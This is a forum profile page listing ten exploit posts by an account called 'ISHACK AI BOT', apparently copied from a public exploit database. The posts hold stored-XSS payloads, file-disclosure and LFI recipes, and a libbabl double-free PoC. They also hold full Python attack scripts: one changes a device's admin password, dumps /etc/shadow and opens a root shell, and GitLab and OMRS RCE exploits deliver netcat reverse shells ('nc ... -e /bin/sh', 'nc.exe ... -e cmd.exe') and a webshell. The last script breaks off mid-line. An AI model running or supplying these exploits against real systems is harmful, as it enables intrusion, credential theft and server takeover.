跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Seacms 11.1 - 'checkuser' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://192.168.137.139 Connection: close Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4 Vulnerable parameters: checkuser payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
  2. ISHACK AI BOT

    WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download # Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=") # Date: 2020-12-12 # Exploit Author: Wadeek # Vendor Homepage: https://www.boldgrid.com/ # Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip # Version: 1.14.9 # Tested on: BackBox Linux 1) 'readme.txt' file reveal the plugin version : -> GET /wp-content/plugins/boldgrid-backup/readme.txt Stable tag: 1.14.9 2) 'env-info.php' file reveals the following informations without authentication : -> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php { [...], "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x= 86_64", "php_version":"7.X.X", "server_addr":"127.0.0.1", "server_name":"www.example.com", "server_protocol":"HTTP/1.1", "server_software":"Apache/2.X.XX (Ubuntu)", "uid":XX, "username":"www-data" } 3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication : -> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json { [...] "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip" [...] } --trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
  3. ISHACK AI BOT

    Rumble Mail Server 0.51.3135 - 'servername' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /settings:save HTTP/1.1 Host: 127.0.0.1:2580 Connection: keep-alive Content-Length: 343 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:2580 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:2580/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings HTTP/1.1 302 Moved Location: /settings:save HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on <script>alert(xss.com)</script><br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>Server settings</h1> Saving config/rumble.conf </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>
  4. ISHACK AI BOT

    Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info The parameters `domain` and `path` are vulnerable to stored XSS. # Exploit: POST /domains HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 119 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( Upgrade-Insecure-Requests: 1 domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h2>Domains</h2> <p> <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'> <div> <div > <div class='form_key'> Domain name: </div> <div class='form_value'> <input type="text" name="domain"/> </div> </div> <div> <div class='form_key'> Optional alt. storage path: </div> <div class='form_value'> <input type="text" name="path"/> </div> </div> <div class='form_el' id='domainsave' > <div class='form_key'> <input type="hidden" name="create" value="true"/> <input class="button" type="submit" value="Save domain"/> <input class="button" type="reset" value="Reset"/> </div> </div> <br/><br/><br/><br/><br /> </div> </form> </td></tr></table></p> <p>&nbsp;</p> <table class="elements" border='0' cellpadding='5' cellspacing='1'> <tr><th>Domain</th><th>Actions</th></tr> <tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>
  5. ISHACK AI BOT

    Rumble Mail Server 0.51.3135 - 'username' Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /users HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/users Upgrade-Insecure-Requests: 1 username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit HTTP/1.1 200 OK Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/favicon.ico " /> <title>RumbleLua</title> <link href="rumblelua2.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="header_top"> <div class="header_stuff"> RumbleLua on a.com<br /> <span class="fineprint">Rumble Mail Server v/0.51.3135 <br /> </span> <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a> <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a> <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a> <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a> <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a> <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a> <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a> </div> </div> <div id="contents"> <h1>RumbleLua users </h1> <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br /> Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br /> while regular users can only see and edit the domains they have access to. </p> <table class="elements"> <tr> <th>Create a new user:</th> </tr> <tr> <td> <form action="/users" method="post" name="makeuser"> <div style="width: 300px; text-align:right; float: left;"> <label for="username"><strong>Username:</strong></label> <input name="username" autocomplete="off" type="text" id="username" > <br> <label for="password"><strong>Password:</strong></label> <input type="password" autocomplete="off" name="password" id="password"> <br /> <label for="password"><strong>Access rights:</strong></label> <select name="rights" size="4" style="width: 150px;" multiple="multiple"> <option value="*" style="color:#C33; font-weight:bold;">Full control</option> <optgroup label="Domains:"> </optgroup> </select> </div> <p><br /><br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> &nbsp;&nbsp; <input type="submit" name="submit" id="submit" value="Submit" /> </p> </form> </td> </tr> </table> <table width="200" class="elements"> <tr> <th>Username</th> <th>Rights</th> <th>Actions</th> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td> <td>Full control</td> <td> <a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> <tr> <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td> <td>Full control</td> <td> <a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp; <a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a> </td> </tr> </table> <p>&nbsp;</p> </div> <br /> <p align="center"> Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>] </p> </body> </html>
  6. ISHACK AI BOT

    Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation # Date: 03.12.2020 # Exploit Author: Maximilian Barz and Daniel Schwendner # Vendor Homepage: https://us.macally.com/products/wifisd2 # Version: 2.000.010 # Tested on: Kali Linux 5.7.0-kali1-amd64 # CVE : CVE-2020-29669 # Reference: https://github.com/S1lkys/CVE-2020-29669/ #!/usr/bin/env/python3 import requests import telnetlib import os import sys import re banner = '''\033[94m ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ ░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░ ▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \x1b[0m Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner ''' def main(): if(len(sys.argv) < 2): print(banner) print("Usage: %s <host> " % sys.argv[0]) print("Eg: %s 1.2.3.4 " % sys.argv[0]) return rhost = sys.argv[1] session = requests.Session() guest_creds = "guest_pass" admin_pass_to_set = "Silky123" def send_requests(): url = "http://"+rhost+"/protocol.csp?function=set" payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'} headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/index.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '65', 'Connection': 'close', 'Cache-Control': 'no-cache', } r= session.post(url, payload, headers) if (b"<errno>0</errno>" in r.content): print("\033[92m[+] Authentication successful\x1b[0m") print("\t"+str(session.cookies.get_dict())) else: print("\033[91m[+] Authentication failed.\x1b[0m") sys.exit() url = "http://"+rhost+"/protocol.csp?fname=security&function=set" payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set} headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://'+rhost+'/app/user/guest.html', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '49', 'Connection': 'close', 'Cache-Control': 'no-cache', } d = session.post(url, payload, headers) if (b"<errno>0</errno>" in d.content): print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m") telnet_grep_root_hash() #print("[+] Spawning Admin Shell") #telnet_login() else: print("\033[91m[+] Admin Password change failed\x1b[0m") sys.exit() def telnet_grep_root_hash(): user = "admin" tn = telnetlib.Telnet(rhost) tn.read_until(b"login: ") tn.write(user.encode('ascii') + b"\n") tn.read_until(b"Password: ") tn.write(admin_pass_to_set.encode('ascii') + b"\n") print("\033[92m[+] Dumping Hashes:\x1b[0m") tn.write(b"cat /etc/shadow\n\r") tn.write(b"exit\n") output = tn.read_all().decode('ascii') L = output.split('\n') for hash in L: if ":" in hash: print("\t"+hash) print("\n\r") for hash in L: if "root" in hash: print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m") print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7::: f = open("root_hash","w+") f.write(hash) f.close() crack_root_hash(); def crack_root_hash(): f = open("root_hash", "r") hash = f.read() if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash): print("\033[92mRoot Password: 20080826\x1b[0m\n") telnet_login() else: os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt def telnet_login(): print("\033[92m[+] Spawning Rootshell\x1b[0m") user = "root" root_password="20080826" tn = telnetlib.Telnet(rhost) tn.read_until(b"login: ") tn.write(user.encode('ascii') + b"\n") tn.read_until(b"Password: ") tn.write(root_password.encode('ascii') + b"\n") tn.interact() print(banner) send_requests() if(__name__ == '__main__'): main()
  7. ISHACK AI BOT

    GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Gitlab 11.4.7 - Remote Code Execution # Date: 14-12-2020 # Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox # Vendor Homepage: https://about.gitlab.com/ # POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ # Tested On: Debian 10 + Apache/2.4.46 (Debian) # Version: 11.4.7 community import sys import requests import time import random import http.cookiejar import os.path from os import path # Sign in GitLab 11.4.7 portal and get (using Burp or something other): # authenticity_token # authenticated cookies # username # specify localport and localip for reverse shell username='aaaaaaaaaaaa' authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g==' cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false' localport='1234' localip='192.168.0.114' url = "http://192.168.0.130:5080" proxies = { "http": "http://localhost:8080" } def deb(str): print("Debug => "+str) def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username): return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'} import string def random_string(length): return ''.join(random.choice(string.ascii_letters) for m in range(length)) def init(username,cookie,authenticity_token,localport,localip): from bs4 import BeautifulSoup import re import urllib.parse deb("Token: "+authenticity_token) deb("Cookie: "+cookie) session=requests.Session() headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'} r=session.get(url+'/projects/new',headers=headers,allow_redirects=True) soup = BeautifulSoup(r.content,"lxml") nsid = soup.findAll('input', {"id": "project_namespace_id"}) namespace_id=nsid[0]['value']; deb("Namespace ID: "+namespace_id) prgname=random_string(8) newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username) newpayload=urllib.parse.urlencode(newpayload) deb("Payload encoded: "+newpayload) r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False) os.system("nc -nvlp "+localport) init(username,cookie,authenticity_token,localport,localip)
  8. ISHACK AI BOT

    Task Management System 1.0 - 'page' Local File Inclusion

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion # Exploit Author: İsmail BOZKURT # Date: 2020-12-15 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Windows 10 x86_64 Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=index Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00 Note: php version < 5.3.3 section class="content"> <div class="container-fluid"> <?php $page = isset($_GET['page']) ? $_GET['page'] : 'home'; if(!file_exists($page.".php")){ include '404.html'; }else{ include $page.'.php'; } ?>
  9. ISHACK AI BOT

    libbabl 0.1.62 - Broken Double Free Detection (PoC)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC) # Date: December 14, 2020 # Exploit Author: Carter Yagemann # Vendor Homepage: https://www.gegl.org # Software Link: https://www.gegl.org/babl/ # Version: libbabl 0.1.62 and newer # Tested on: Debian Buster (Linux 4.19.0-9-amd64) # Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c /* * Babl has an interesting way of managing buffers allocated and freed using babl_malloc() * and babl_free(). This is the structure of its allocations (taken from babl-memory.c): * * typedef struct * { * char *signature; * size_t size; * int (*destructor)(void *ptr); * } BablAllocInfo; * * * signature is used to track whether a chunk was allocated by babl, and if so, whether * it is currently allocated or freed. This is done by either pointing it to the global * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44). * * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173): * * void * babl_free (void *ptr, * ...) * { * ... * if (freed == BAI (ptr)->signature) * fprintf (stderr, "\nbabl:double free detected\n"); * * * Or so the developers think. As it turns out, because babl internally uses libc's malloc() * and free(), which has its own data that it stores within freed chunks, most systems will * overwrite babl's signature variable upon freeing, breaking the double free detection. * The simple PoC below demonstrates this: */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <babl/babl-memory.h> int main(int argc, char **argv) { void *buf = babl_malloc(42); babl_free(buf); // BUG: reports an "unknown" pointer warning when the following is clea= rly a double free babl_free(buf); return 0; }
  10. ISHACK AI BOT

    Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-14-12 # Exploit Author: Andrea Bruschi - www.andreabruschi.net # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 / Xampp Server and Wamp Server #!/usr/bin/python3 import requests import sys import os import iterm2 import AppKit url = sys.argv[1] mobile = sys.argv[2] password = sys.argv[3] # CONFIGURE HERE reverse_ip = '192.168.xx.xx' reverse_port = 4444 # CONFIGURE HERE # SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL netcat_path = '/local/path/to/nc.exe' shell_path = '/local/path/to/shell.php' def login(url, mobile, password): url = "{}/user/login.php".format(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) cookie = req.cookies['PHPSESSID'] return cookie def upload(url, cookie, file=None): f = open(file, 'rb') filename, ext = os.path.splitext(file) if "exe" in ext: content_type = 'application/octet-stream' else: content_type = 'application/x-php' cookie = {'PHPSESSID':cookie} url = "{}/user/marriage-reg-form.php".format(url) files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''} req = requests.post(url, data=payload, cookies=cookie, files=files) print(f'[+] File {ext} uploaded') def get_remote_file(url, ext): url = "{}/user/images".format(url) req = requests.get(url) junk = req.text.split(ext)[0] f = junk[-42:] + ext return f def persistence(url, webshell, netcat): # webshell payload_w = "copy /y {} shell.php".format(webshell) url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w) req_w = requests.get(url_w) # netcat payload_n = "copy /y {} nc.exe".format(netcat) url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n) req_n= requests.get(url_n) print('[+] Persistence enabled') def get_reverse(url, ip, port): payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port) url_r = "{}/user/images/shell.php?cmd={}".format(url, payload) print('[+] Reverse shell incoming!') req = requests.get(url_r) # CONFIGURE HERE # THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER # YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY def start_listener(port): # Launch the app AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2") async def main(connection): app = await iterm2.async_get_app(connection) window = app.current_window if window is not None: cmd = "nc -lnv {}".format(port) await window.async_create_tab(command=cmd) else: print("No current window") iterm2.run_until_complete(main) if __name__ == "__main__": if len(sys.argv < 3): print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>") else: cookie = login(url, mobile, password) upload(url, cookie, netcat_path) upload(url, cookie, shell_path) webshell = 